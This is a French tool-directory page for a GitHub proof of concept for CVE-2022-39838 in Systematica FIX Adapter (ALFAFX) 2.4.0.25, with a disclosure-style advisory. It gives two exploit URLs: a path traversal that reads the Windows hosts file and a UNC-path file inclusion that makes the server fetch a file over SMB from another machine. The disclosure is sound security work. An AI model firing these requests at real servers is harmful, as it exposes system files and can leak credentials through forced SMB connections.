Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-39838 — Preuve de concept d'exploitation pour CVE-2022-39838 démontrant l'inclusion de fichier à distance et le traversement de chemin absolu dans Systematica FIX Adapter (ALFAFX) 2.4.0.25 via des requêtes HTTP. | Kitploit
Outils/GitHubGitHub/jet-pentest/cve-2022-39838
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubjet-pentest/cve-2022-39838

CVE-2022-39838

Preuve de concept d'exploitation pour CVE-2022-39838 démontrant l'inclusion de fichier à distance et le traversement de chemin absolu dans Systematica FIX Adapter (ALFAFX) 2.4.0.25 via des requêtes HTTP.

Voir le dépôt
12il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-39838

[Description suggérée]

Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 permet l'inclusion de fichiers à distance via un chemin de partage UNC, et permet également une traversée de chemin absolue vers des chemins locaux.

[Informations supplémentaires]

PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt

[Type de vulnérabilité]

Contrôle d'accès incorrect

[Fournisseur du produit]

Systematica

[Base de code du produit affecté]

Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)

[Type d'attaque]

À distance

[Impact : divulgation d'informations]

true

[Vecteurs d'attaque]

Un utilisateur distant peut accéder à un fichier arbitraire du système d'exploitation via un chemin absolu. De plus, un utilisateur distant peut contraindre le serveur vulnérable à demander un fichier à une autre machine via SMB.

[Découvreur]

Ivashchenko Sergey (Jet Infosystems, jet.su)

[Référence]

http://systematicalpha.com/company

Télécharger l’outil